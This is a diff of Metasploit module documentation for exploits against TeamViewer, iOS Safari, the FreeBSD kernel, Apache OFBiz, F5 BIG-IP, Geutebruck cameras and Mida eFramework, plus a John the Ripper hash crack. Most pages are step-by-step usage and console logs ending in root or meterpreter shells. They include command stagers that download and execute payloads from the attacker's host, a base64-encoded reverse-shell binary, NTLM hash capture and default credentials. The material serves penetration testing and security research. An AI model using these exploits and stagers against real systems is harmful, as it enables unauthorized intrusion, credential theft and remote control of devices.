+user@kali:~/metasploit-framework$ sudo cat /tmp/cram
+username_cram:<12345@127.0.0.1>#7b0675225a3ac2b9231c2e939986ce42
+user@kali:~/metasploit-framework$ sudo cat /tmp/wordlist 
+password_cram
+user@kali:~/metasploit-framework$ sudo john --wordlist=/tmp/wordlist --format=hmac-md5 /tmp/cram
+Using default input encoding: UTF-8
+Loaded 1 password hash (HMAC-MD5 [password is key, MD5 256/256 AVX2 8x3])
+Warning: poor OpenMP scalability for this hash type, consider --fork=8
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+Warning: Only 1 candidate left, minimum 192 needed for performance.
+password_cram    (username_cram)
+1g 0:00:00:00 DONE (2020-04-17 11:32) 50.00g/s 50.00p/s 50.00c/s 50.00C/s password_cram
+Use the "--show --format=HMAC-MD5" options to display all of the cracked passwords reliably
+Session completed
+```
@@ -0,0 +1,126 @@
+## Vulnerable Application
+
+This module exploits an unquoted parameter call within the
+Teamviewer URI handler to create an SMB connection to an attacker
+controlled IP.
+
+TeamViewer < 8.0.258861, 9.0.258860, 10.0.258873,
+11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350, and
+15.8.3 are vulnerable.
+
+Only Firefox can be exploited by this
+vulnerability, as all other browsers encode the space after 'play'
+and before the SMB location, preventing successful exploitation.
+
+Teamviewer 15.4.4445, and 8.0.16642 were successfully tested against.
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use auxiliary/server/teamviewer_uri_smb_redirect`
+1. Do: `set SMB_SERVER [IP]`
+1. Do: `run`
+1. Start an SMB Capture or Relay server (such as responder)
+1. Open the URL on the target
+1. The SMB Server should receive a connection.
+
+## Options
+
+### FILE_NAME
+
+The SMB file to link to.  This is an arbitrary file name.  Default is `\\teamviewer\\config.tvs`
+
+### SMB_SERVER
+
+The SMB server IP address.
+
+### URI_HANDLER
+
+The URI Handler to use.  Typically the default `teamviewer10`
+
+## Scenarios
+
+### TeamViewer 15.4.4445 on Windows 10 1909 with Firefox 79
+
+```
+[*] Processing teamviewer.rb for ERB directives.
+resource (teamviewer.rb)> use auxiliary/server/teamviewer_uri_smb_redirect
+resource (teamviewer.rb)> set smb_server 2.2.2.2
+smb_server => 2.2.2.2
+resource (teamviewer.rb)> run -j
+[*] Auxiliary module running as background job 0.
+[+] Please start an SMB capture/relay on 2.2.2.2
+[*] Using URL: http://0.0.0.0:8080/IDGynsGNfXD5eFB
+[*] Local IP: http://1.1.1.1:8080/IDGynsGNfXD5eFB
+[*] Server started.
+```
+
+Start the SMB replay/capture
+
+```
+resource (teamviewer.rb)> sudo responder -I wlan0
+[*] exec: sudo responder -I wlan0
+
+                                         __
+  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
+  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
+  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
+                   |__|
+
+           NBT-NS, LLMNR & MDNS Responder 3.0.0.0
+
+  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
+  To kill this script hit CTRL-C
+
+
+[+] Poisoners:
+    LLMNR                      [ON]
+    NBT-NS                     [ON]
+    DNS/MDNS                   [ON]
+
+[+] Servers:
+    HTTP server                [ON]
+    HTTPS server               [ON]
+    WPAD proxy                 [OFF]
+    Auth proxy                 [OFF]
+    SMB server                 [ON]
+    Kerberos server            [ON]
+    SQL server                 [ON]
+    FTP server                 [ON]
+    IMAP server                [ON]
+    POP3 server                [ON]
+    SMTP server                [ON]
+    DNS server                 [ON]
+    LDAP server                [ON]
+    RDP server                 [ON]
+
+[+] HTTP Options:
+    Always serving EXE         [OFF]
+    Serving EXE                [OFF]
+    Serving HTML               [OFF]
+    Upstream Proxy             [OFF]
+
+[+] Poisoning Options:
+    Analyze Mode               [OFF]
+    Force WPAD auth            [OFF]
+    Force Basic Auth           [OFF]
+    Force LM downgrade         [OFF]
+    Fingerprint hosts          [OFF]
+
+[+] Generic Options:
+    Responder NIC              [wlan0]
+    Responder IP               [2.2.2.2]
+    Challenge set              [random]
+    Don't Respond To Names     ['ISATAP']
+
+
+
+[!] Error starting TCP server on port 80, check permissions or other servers running.
+[+] Listening for events...
+[*] Request received for: /IDGynsGNfXD5eFB
+[*] Sending TeamViewer Link to Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0...
+[SMB] NTLMv2-SSP Client   : 3.3.3.3
+[SMB] NTLMv2-SSP Username : DESKTOP\h00die
+[SMB] NTLMv2-SSP Hash     : h00die::DESKTOP:1111111111111111:11111111111111111111111111111111:000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
+```
@@ -0,0 +1,66 @@
+## Vulnerable Application
+
+This module exploits a JIT optimization bug in Safari Webkit. This allows us to
+write shellcode to an RWX memory section in JavaScriptCore and execute it. The
+shellcode contains a kernel exploit (CVE-2016-4669) that obtains kernel rw,
+obtains root and disables code signing. Finally we download and execute the
+meterpreter payload.
+
+This module has been tested against iOS 7.1.2 on an iPhone 4.
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use exploit/apple_ios/browser/safari_jit`
+1. Do: `set lhost [ip]`
+1. Do: `set srvhost [ip]`
+1. Do: `run`
+1. Browse to the website with a vulnerable device
+1. You should get a root shell.
+
+## Options
+
+### DEBUG_EXPLOIT
+
+Show debug information during exploitation.  This will add entries to the iPhone syslog related to exploitation and
+loading of the payload.  Defaults to `false`
+
+## Scenarios
+
+
+### iPhone 4 with iOS 7.1.2
+
+```
+msf5 > use exploit/apple_ios/browser/safari_jit
+[*] Using configured payload apple_ios/armle/meterpreter_reverse_tcp
+msf5 exploit(apple_ios/browser/safari_jit) > set lhost 1.1.1.1
+lhost => 1.1.1.1
+msf5 exploit(apple_ios/browser/safari_jit) > set srvhost 1.1.1.1
+srvhost => 1.1.1.1
+msf5 exploit(apple_ios/browser/safari_jit) > set verbose true
+verbose => true
+msf5 exploit(apple_ios/browser/safari_jit) > run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+msf5 exploit(apple_ios/browser/safari_jit) > 
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Using URL: http://1.1.1.1:8080/
+[*] Server started.
+[*] 2.2.2.2    safari_jit - Request / from Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
+[*] 2.2.2.2    safari_jit - Request /loader.b64?cache=1596557302841 from Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
+[*] 2.2.2.2    safari_jit - Request /macho.b64?cache=1596557303179 from Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
+[*] 2.2.2.2    safari_jit - Request /payload from MobileSafari/9537.53 CFNetwork/672.1.15 Darwin/14.0.0
+[+] 2.2.2.2    safari_jit - Target is vulnerable, sending payload!
+[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:49299) at 2020-08-04 12:08:27 -0400
+sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: root @ iPhone (uid=0, gid=0, euid=0, egid=0)
+meterpreter > sysinfo
+Computer     : 2.2.2.2
+OS           : iPhone3,3 (iOS 11D257)
+Architecture : armv7
+BuildTuple   : arm-iphone-darwin
+Meterpreter  : armle/apple_ios
+```
@@ -0,0 +1,118 @@
+## Vulnerable Application
+
+This module exploits a race and use-after-free vulnerability in the
+FreeBSD kernel IPv6 socket handling. A missing synchronization lock
+in the `IPV6_2292PKTOPTIONS` option handling in `setsockopt` permits
+racing `ip6_setpktopt` access to a freed `ip6_pktopts` struct.
+
+This exploit overwrites the `ip6po_pktinfo` pointer of a `ip6_pktopts`
+struct in freed memory to achieve arbitrary kernel read/write.
+
+This module has been tested successfully on:
+
+* FreeBSD 9.0-RELEASE #0 (amd64)
+* FreeBSD 9.1-RELEASE #0 r243825 (amd64)
+* FreeBSD 9.2-RELEASE #0 r255898 (amd64)
+* FreeBSD 9.3-RELEASE #0 r268512 (amd64)
+* FreeBSD 12.0-RELEASE r341666 (amd64)
+* FreeBSD 12.1-RELEASE r354233 (amd64)
+
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. Get a session
+3. `use exploit/freebsd/local/ip6_setpktopt_uaf_priv_esc`
+4. `set SESSION <SESSION>`
+5. `check`
+6. `run`
+7. You should get a new *root* session
+
+
+## Options
+
+### NUM_SPRAY
+
+Spray iterations (default (`256`)
+
+### NUM_SPRAY_RACE
+
+Race iterations (default: `32`)
+
+### ForceExploit
+
+Override check result (default: `false`)
+
+### WritableDir
+
+A directory where we can write files (default: `/tmp`)
+
+
+## Scenarios
+
+### FreeBSD 9.3-RELEASE #0 r268512 (amd64)
+
+```
+msf5 > use exploit/freebsd/local/ip6_setpktopt_uaf_priv_esc
+[*] Using configured payload bsd/x64/shell_reverse_tcp
+msf5 exploit(freebsd/local/ip6_setpktopt_uaf_priv_esc) > set lhost 172.16.191.165
+lhost => 172.16.191.165
+msf5 exploit(freebsd/local/ip6_setpktopt_uaf_priv_esc) > set session 1
+session => 1
+msf5 exploit(freebsd/local/ip6_setpktopt_uaf_priv_esc) > run
+
+[!] SESSION may not be compatible with this module.
+[*] Started reverse TCP handler on 172.16.191.165:4444
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target appears to be vulnerable.
+[*] Using target: FreeBSD 9.3-RELEASE #0 r268512 - allproc offset: 0x1295800
+[*] Writing '/tmp/.SnZgWBMA.c' (14147 bytes) ...
+[*] Compiling /tmp/.SnZgWBMA.c ...
+[*] Writing '/tmp/.d97xapNItz' (218 bytes) ...
+[*] Launching exploit (timeout: 30s) ...
+[*] uid=0(root) gid=0(wheel) egid=1002(asdf) groups=1002(asdf)
+[+] Success! Executing payload...
+[*] Command shell session 2 opened (172.16.191.165:4444 -> 172.16.191.142:61848) at 2020-07-09 18:02:09 -0400
+[+] Deleted /tmp/.SnZgWBMA.c
+[+] Deleted /tmp/.SnZgWBMA
+[+] Deleted /tmp/.d97xapNItz
+
+id
+uid=0(root) gid=0(wheel) egid=1002(asdf) groups=1002(asdf)
+uname -a
+FreeBSD freebsd-9-3-amd64 9.3-RELEASE FreeBSD 9.3-RELEASE #0 r268512: Thu Jul 10 23:44:39 UTC 2014     root@snap.freebsd.org:/usr/obj/usr/src/sys/GENERIC  amd64
+```
+
+### FreeBSD 12.1-RELEASE r354233 (amd64)
+
+```
+msf5 > use exploit/freebsd/local/ip6_setpktopt_uaf_priv_esc
+[*] Using configured payload bsd/x64/shell_reverse_tcp
+msf5 exploit(freebsd/local/ip6_setpktopt_uaf_priv_esc) > set lhost 172.16.191.165
+lhost => 172.16.191.165
+msf5 exploit(freebsd/local/ip6_setpktopt_uaf_priv_esc) > set session 1
+session => 1
+msf5 exploit(freebsd/local/ip6_setpktopt_uaf_priv_esc) > run
+
+[!] SESSION may not be compatible with this module.
+[*] Started reverse TCP handler on 172.16.191.165:4444
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target appears to be vulnerable.
+[*] Using target: FreeBSD 12.1-RELEASE r354233 - allproc offset: 0x1df7648
+[*] Writing '/tmp/.V8vZ5.c' (14162 bytes) ...
+[*] Compiling /tmp/.V8vZ5.c ...
+[*] Writing '/tmp/.ok9laPn' (218 bytes) ...
+[*] Launching exploit (timeout: 30s) ...
+[*] uid=0(root) gid=0(wheel) egid=1002(asdf) groups=1002(asdf)
+[+] Success! Executing payload...
+[*] Command shell session 2 opened (172.16.191.165:4444 -> 172.16.191.140:35808) at 2020-07-09 18:04:24 -0400
+[+] Deleted /tmp/.V8vZ5.c
+[+] Deleted /tmp/.V8vZ5
+[+] Deleted /tmp/.ok9laPn
+
+id
+uid=0(root) gid=0(wheel) egid=1002(asdf) groups=1002(asdf)
+uname -a
+FreeBSD freebsd-12-1-amd64 12.1-RELEASE FreeBSD 12.1-RELEASE r354233 GENERIC  amd64
+```
+
@@ -0,0 +1,107 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits a Java deserialization vulnerability in Apache
+OFBiz's unauthenticated XML-RPC endpoint `/webtools/control/xmlrpc` for
+versions prior to 17.12.04.
+
+### Setup
+
+You can use <https://hub.docker.com/r/opensourceknight/ofbiz>.
+
+1. Initialize the database with demo data (`INIT_DB=2`)
+    * `docker run --rm -e INIT_DB=2 opensourceknight/ofbiz:15.12`
+1. Start a postgres instance
+    * `docker run --name some-postgres -e POSTGRES_PASSWORD=mysecretpassword -d postgres`
+1. Link the database and OFBiz containers
+    * `docker run -d -p 80:8080 -p 8443:8443 --link some-postgres:postgres opensourceknight/ofbiz:15.12`
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Targets
+
+### 0
+
+This executes a Unix command.
+
+### 1
+
+This uses a Linux dropper to execute code.
+
+## Scenarios
+
+### Apache OFBiz from [Docker](#setup).
+
+```
+msf6 > use exploit/linux/http/apache_ofbiz_deserialiation
+[*] Using configured payload linux/x64/meterpreter_reverse_https
+msf6 exploit(linux/http/apache_ofbiz_deserialiation) > options
+
+Module options (exploit/linux/http/apache_ofbiz_deserialiation):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      8443             yes       The target port (TCP)
+   SSL        true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       Base path
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (linux/x64/meterpreter_reverse_https):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The local listener hostname
+   LPORT  8443             yes       The local listener port
+   LURI                    no        The HTTP Path
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Linux Dropper
+
+
+msf6 exploit(linux/http/apache_ofbiz_deserialiation) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 exploit(linux/http/apache_ofbiz_deserialiation) > set lhost 192.168.1.7
+lhost => 192.168.1.7
+msf6 exploit(linux/http/apache_ofbiz_deserialiation) > set srvport 8888
+srvport => 8888
+msf6 exploit(linux/http/apache_ofbiz_deserialiation) > run
+
+[*] Started HTTPS reverse handler on https://192.168.1.7:8443
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target is vulnerable. Target can deserialize arbitrary data.
+[*] Executing Linux Dropper for linux/x64/meterpreter_reverse_https
+[*] Using URL: http://0.0.0.0:8888/AGB4cD
+[*] Local IP: http://10.3.227.250:8888/AGB4cD
+[*] Generated command stager: ["curl${IFS}-so${IFS}/tmp/fNZHtLgv${IFS}http://192.168.1.7:8888/AGB4cD;chmod${IFS}+x${IFS}/tmp/fNZHtLgv;/tmp/fNZHtLgv;rm${IFS}-f${IFS}/tmp/fNZHtLgv"]
+[*] Executing command: sh -c curl${IFS}-so${IFS}/tmp/fNZHtLgv${IFS}http://192.168.1.7:8888/AGB4cD;chmod${IFS}+x${IFS}/tmp/fNZHtLgv;/tmp/fNZHtLgv;rm${IFS}-f${IFS}/tmp/fNZHtLgv
+[*] Client 192.168.1.7 (curl/7.38.0) requested /AGB4cD
+[*] Sending payload to 192.168.1.7 (curl/7.38.0)
+[+] Successfully executed command: sh -c curl${IFS}-so${IFS}/tmp/fNZHtLgv${IFS}http://192.168.1.7:8888/AGB4cD;chmod${IFS}+x${IFS}/tmp/fNZHtLgv;/tmp/fNZHtLgv;rm${IFS}-f${IFS}/tmp/fNZHtLgv
+[*] https://192.168.1.7:8443 handling request from 192.168.1.7; (UUID: btpun2w7) Redirecting stageless connection from /1fY1FTBqS3Z81nrUI-E3VQ3E-Kqn5Kx4lP2cAzF4bmUgveaMUNylCEh1ohulKhz1fERPwYd8u4DAauCLZ8UDm5JaB7P with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
+[*] https://192.168.1.7:8443 handling request from 192.168.1.7; (UUID: btpun2w7) Attaching orphaned/stageless session...
+[*] Command Stager progress - 104.14% done (151/145 bytes)
+[*] Meterpreter session 1 opened (192.168.1.7:8443 -> 192.168.1.7:61375) at 2020-08-14 21:42:11 -0500
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: root @ 09d1564c6b2c (uid=0, gid=0, euid=0, egid=0)
+meterpreter > sysinfo
+Computer     : 172.17.0.2
+OS           : Debian 8.4 (Linux 4.19.76-linuxkit)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
@@ -0,0 +1,128 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits a directory traversal in F5's BIG-IP Traffic
+Management User Interface (TMUI) to upload a shell script and execute
+it as the Unix root user.
+
+Unix shell access is obtained by escaping the restricted Traffic
+Management Shell (TMSH). The escape may not be reliable, and you may
+have to run the exploit multiple times. Sorry!
+
+Versions 11.6.1-11.6.5, 12.1.0-12.1.5, 13.1.0-13.1.3, 14.1.0-14.1.2,
+15.0.0, and 15.1.0 are known to be vulnerable. Fixes were introduced
+in 11.6.5.2, 12.1.5.2, 13.1.3.4, 14.1.2.6, and 15.1.0.4.
+
+Tested against the VMware OVA release of 14.1.2.
+
+### Setup
+
+Download
+[BIGIP-14.1.2-0.0.37.ALL-scsi.ova](https://downloads.f5.com/esd/serveDownload.jsp?path=/big-ip/big-ip_v14.x/14.1.2/english/virtual-edition/&sw=BIG-IP&pro=big-ip_v14.x&ver=14.1.2&container=Virtual-Edition&file=BIGIP-14.1.2-0.0.37.ALL-scsi.ova)
+and import it into your desired virtualization software.
+
+You _may_ need to log in to the management interface as the `admin` user
+to complete system initialization and make the target exploitable. The
+default password for the `admin` user is `admin`.
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Targets
+
+### 0
+
+This executes a Unix command.
+
+### 1
+
+This uses a Linux dropper to execute code.
+
+## Options
+
+### WritableDir
+
+Set this to a writable directory in which files will be dropped.
+Defaults to `/tmp`.
+
+## Scenarios
+
+### F5 BIG-IP 14.1.2 in VMware Fusion
+
+```
+msf5 > use exploit/linux/http/f5_bigip_tmui_rce
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf5 exploit(linux/http/f5_bigip_tmui_rce) > options
+
+Module options (exploit/linux/http/f5_bigip_tmui_rce):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      443              yes       The target port (TCP)
+   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       Base path
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (linux/x64/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Linux Dropper
+
+
+msf5 exploit(linux/http/f5_bigip_tmui_rce) > set rhosts 172.16.249.179
+rhosts => 172.16.249.179
+msf5 exploit(linux/http/f5_bigip_tmui_rce) > set lhost 172.16.249.1
+lhost => 172.16.249.1
+msf5 exploit(linux/http/f5_bigip_tmui_rce) > run
+
+[*] Started reverse TCP handler on 172.16.249.1:4444
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target is vulnerable. Target is running BIG-IP 14.1.2.
+[*] Creating alias list=bash
+[-] Alias "list" already exists, deleting it
+[*] Deleting alias list=bash
+[+] Successfully deleted alias list=bash
+[*] Creating alias list=bash
+[+] Successfully created alias list=bash
+[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
+[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAASDH/aglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXKwQ+QFRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==>>'/tmp/wCkkU.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/whuIi' < '/tmp/wCkkU.b64' ; chmod +x '/tmp/whuIi' ; '/tmp/whuIi' ; rm -f '/tmp/whuIi' ; rm -f '/tmp/wCkkU.b64'"]
+[*] Executing command: echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAASDH/aglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXKwQ+QFRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==>>'/tmp/wCkkU.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/whuIi' < '/tmp/wCkkU.b64' ; chmod +x '/tmp/whuIi' ; '/tmp/whuIi' ; rm -f '/tmp/whuIi' ; rm -f '/tmp/wCkkU.b64'
+[*] Uploading /tmp/WuyGIfbP
+[+] Successfully uploaded /tmp/WuyGIfbP
+[*] Executing /tmp/WuyGIfbP
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3012516 bytes) to 172.16.249.179
+[*] Meterpreter session 1 opened (172.16.249.1:4444 -> 172.16.249.179:55118) at 2020-07-17 06:06:38 -0500
+[+] Deleted /tmp/WuyGIfbP
+[*] Command Stager progress - 100.00% done (823/823 bytes)
+[*] Deleting alias list=bash
+[+] Successfully deleted alias list=bash
+
+meterpreter > getuid
+Server username: no-user @ localhost.localdomain (uid=0, gid=0, euid=0, egid=0)
+meterpreter > sysinfo
+Computer     : localhost.localdomain
+OS           : CentOS 7.3.1611 (Linux 3.10.0-514.26.2.el7.ve.x86_64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
@@ -0,0 +1,90 @@
+## Vulnerable Application
+
+The following [Geutebruck](https://www.geutebrueck.com) products using firmware versions <= 1.12.0.25,
+firmware version 1.12.13.2 or firmware version 1.12.14.5:
+* Encoder and E2 Series Camera models:
+  * G-Code:
+    * EEC-2xxx
+  * G-Cam:
+    * EBC-21xx
+    * EFD-22xx
+    * ETHC-22xx
+    * EWPC-22xx
+
+Many brands use the same firmware:
+  * UDP Technology (which is also the supplier of the firmware for the other vendors)
+  * Ganz
+  * Visualint
+  * Cap
+  * THRIVE Intelligence
+  * Sophus
+  * VCA
+  * TripCorps
+  * Sprinx Technologies
+  * Smartec
+  * Riva
+
+This module has been tested on a Geutebruck 5.02024 G-Cam EFD-2250 running firmware version 1.12.14.5.
+
+### Description
+
+This module exploits an authenticated OS command injection vulnerability (CVE-2020-16205) within the
+`server` GET parameter of /uapi-cgi/admin/testaction.cgi when the `type` parameter is set to `ntp`.
+This issue occurs due to a lack of validation on the `server` parameter, which allows an attacker to
+inject a new line character, followed by the command they wish to execute, at which point the server will
+then interpret the new string as a separate command to be executed. Successful exploitation will result in
+remote code execution as the `root` user.
+
+Users can find additional details of this vulnerability on the advisory page at https://us-cert.cisa.gov/ics/advisories/icsa-20-219-03.
+
+## Verification Steps
+
+  1. Start the camera using default configuration
+  2. Launch msfconsole
+  3. Do: `use exploit/linux/http/geutebruck_testaction_exec`
+  4. Do: `set httpusername <camera_username>`
+  5. Do: `set httppassword <camera_password>`
+  6. Do: `set lhost <metasploit_ip>`
+  5. Do: `set rhosts <camera_ip>`
+  6. Do: `set payload cmd/unix/reverse_netcat_gaping`
+  7. Do: `check` to be sure the target is vulnerable
+  8. Do: `exploit`
+  9. You should get a shell
+
+## Options
+
+The default credentials to log on the web interface are root/admin.
+
+ ### HTTPUSERNAME
+ A username used to authenticate on the admin page. **Default: root**
+
+ ### HTTPPASSWORD
+The password of the username used to authenticate on the admin page. **Default: admin**
+
+## Scenarios
+### Geutebruck 5.02024 G-Cam EFD-2250 running firmware version 1.12.14.5.
+```
+msf5 > use exploit/linux/http/geutebruck_testaction_exec
+msf5 exploit(linux/http/geutebruck_testaction_exec) > set payload cmd/unix/reverse_netcat_gaping
+payload => cmd/unix/reverse_netcat_gaping
+msf5 exploit(linux/http/geutebruck_testaction_exec) > set httpusername root
+httpusername => root
+msf5 exploit(linux/http/geutebruck_testaction_exec) > set httppassword admin
+httppassword => admin
+msf5 exploit(linux/http/geutebruck_testaction_exec) > set lhost 192.168.14.1
+lhost => 192.168.14.1
+msf5 exploit(linux/http/geutebruck_testaction_exec) > set rhosts 192.168.14.58
+rhosts => 192.168.14.58
+msf5 exploit(linux/http/geutebruck_testaction_exec) > exploit
+
+[*] Started reverse TCP handler on 192.168.14.1:4444
+[*] 192.168.14.58:80 - Attempting to exploit...
+[*] Command shell session 3 opened (192.168.14.1:4444 -> 192.168.14.58:43392) at 2020-04-02 18:26:28 +0200
+pwd
+
+/tmp/www_ramdisk/uapi-cgi/admin
+id
+uid=0(root) gid=0(root)
+uname -a
+Linux EFD-2250 2.6.18_IPNX_PRODUCT_1.1.2-ge52275bd #1 PREEMPT Thu Jul 25 20:25:39 KST 2019 armv5tejl GNU/Linux
+```
@@ -3,7 +3,8 @@
 IBM Data Risk Manager (IDRM) contains three vulnerabilities that can be chained by an unauthenticated attacker to achieve remote code execution as root.
 The first is an unauthenticated bypass, followed by a command injection as the server user, and finally abuse of an insecure default password.
 This module exploits all three vulnerabilities, giving the attacker a root shell.
-At the time of disclosure, this is a 0day. Versions 2.0.3 and below are confirmed to be affected, and the latest 2.0.6 is most likely affected too.
+At the time of disclosure this was an 0day, but it was later confirmed and patched by IBM. The authentication bypass works on versions <= 2.0.6.1,
+but the command injection should only work on versions <= 2.0.4 according to IBM.


 ### Vulnerability information
@@ -0,0 +1,64 @@
+## Vulnerable Application
+
+This module exploits a command injection vulnerability in
+[Mida Solutions eFramework](https://www.midasolutions.com/)
+version 2.9.0 and prior.
+
+The `ajaxreq.php` file allows unauthenticated users to inject
+arbitrary commands in the `PARAM` parameter to be executed as
+the apache user. The sudo configuration permits the apache user
+to execute any command as root without providing a password,
+resulting in privileged command execution as root.
+
+This module has been successfully tested on Mida Solutions
+eFramework-C7-2.9.0 virtual appliance.
+
+Download:
+
+http://ova-efw.midasolutions.com/
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use exploit/linux/http/mida_solutions_eframework_ajaxreq_rce`
+1. Do: `set RHOSTS [IP]`
+1. Do: `set payload [payload]`
+1. Do: `set LHOST [IP]`
+1. Do: `exploit`
+
+## Options
+
+### TARGETURI
+
+Base path to eFramework (Default: `/`)
+
+## Scenarios
+
+```
+msf6 > use exploit/linux/http/mida_solutions_eframework_ajaxreq_rce 
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/mida_solutions_eframework_ajaxreq_rce) > set rhosts 172.16.191.123
+rhosts => 172.16.191.123
+msf6 exploit(linux/http/mida_solutions_eframework_ajaxreq_rce) > check
+[+] 172.16.191.123:443 - The target is vulnerable.
+msf6 exploit(linux/http/mida_solutions_eframework_ajaxreq_rce) > set lhost 172.16.191.165
+lhost => 172.16.191.165
+msf6 exploit(linux/http/mida_solutions_eframework_ajaxreq_rce) > run
+
+[*] Started reverse TCP handler on 172.16.191.165:4444 
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target is vulnerable.
+[*] Sending stage (3008420 bytes) to 172.16.191.123
